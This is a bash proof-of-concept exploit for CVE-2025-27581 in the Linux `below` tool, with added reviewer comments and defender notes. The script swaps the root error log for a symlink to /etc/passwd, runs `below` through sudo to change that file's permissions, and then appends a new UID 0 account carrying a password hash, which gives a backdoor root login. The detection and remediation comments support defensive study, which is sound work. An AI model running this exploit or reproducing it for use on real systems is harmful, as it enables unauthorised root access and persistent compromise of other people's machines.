#!/bin/bash
# Proof-of-concept for CVE-2025-27581 as published on this page: it replaces
# the `below` root error log with a symlink to /etc/passwd, runs `below`
# through sudo, and then appends a UID 0 account line to /etc/passwd.
#
# Arguments: $1 - account name to append
#            $2 - password for that account
# Exit:      1 when the argument count is not exactly 2
#
# Preconditions visible in the script: the invoking user can delete and create
# entries in /var/log/below without sudo, and is allowed to run `below` via
# sudo.
#
# Defender notes (derived from the steps below):
#   - the symlink at /var/log/below/error_root.log exists only while the
#     script runs; the last line removes it again;
#   - what remains afterwards is, per the script's own message, a changed mode
#     on /etc/passwd, plus one extra line with UID 0 / GID 0 that carries a
#     $6$ crypt hash in the password field;
#   - auditing writes and attribute changes on /etc/passwd, and checking for
#     UID 0 entries other than root, covers both artifacts;
#   - NOTE(review): remediation is presumably a fixed `below` release and a
#     /var/log/below that unprivileged users cannot write to — confirm against
#     the vendor advisory.

# Require exactly two arguments (username, password); otherwise print usage.
if [ "$#" -ne 2 ]; then
echo "CVE-2025-27581 exploiter. Creates a fake root account in /etc/passwd";
echo "Usage: $0 <username> <password>";
exit 1;
# NOTE(review): unreachable, the exit above always runs first.
echo "WARNING: Your password could be seen in the logs / processes as it's input as cmdline arguments";
fi
# The password is taken from argv, so it is visible in process listings and
# shell history.
echo "WARNING: Your password could be seen in the logs / processes as it's input as cmdline arguments";
# Remove any existing root error log so the path is free for the symlink.
# Runs without sudo, so it relies on the invoking user having write access to
# the directory.
root_log_path=/var/log/below/error_root.log;
rm $root_log_path;
# Replace the log file with a symlink whose target is /etc/passwd.
ln -s /etc/passwd $root_log_path;
# Run `below` as root. The following message implies this run changes the
# permissions of the symlink target; the mechanism is inside `below`, not
# visible here.
sudo below debug dump-store --time 1;
echo "New permissions set on /etc/passwd";
# Show the resulting mode and ownership of /etc/passwd.
ls -la /etc/passwd;
# Read the two positional arguments.
username=$1;
password=$2;
# Create a SHA-512 crypt hash of the input password with a random salt.
hashed=$(/usr/bin/openssl passwd -6 $password);
# NOTE(review): epoch_time is assigned but never used afterwards.
epoch_time=$(date +%s);
# passwd(5) line: name, password hash, UID 0, GID 0, GECOS, home, shell.
passwd_hash_entry="$username:$hashed:0:0:root:/root:/bin/bash";
echo "Overwriting /etc/passwd with the new account now"
# Append (not overwrite, despite the message) the entry, without sudo.
echo $passwd_hash_entry >> /etc/passwd;
echo "Hopefully that worked";
echo "Try logging in as $username:$password";
# /etc/passwd is world-readable, so the hash placed there is exposed to every
# local user.
echo "WARNING 2: Your password hash has been stored in /etc/passwd so can be seen by ANYONE on the system";
echo "I reccommend you update it via passwd and make sure it's gone from /etc/shadow";
# Cleanup: removes the symlink only. The appended /etc/passwd line and the
# changed file mode are left in place.
rm $root_log_path;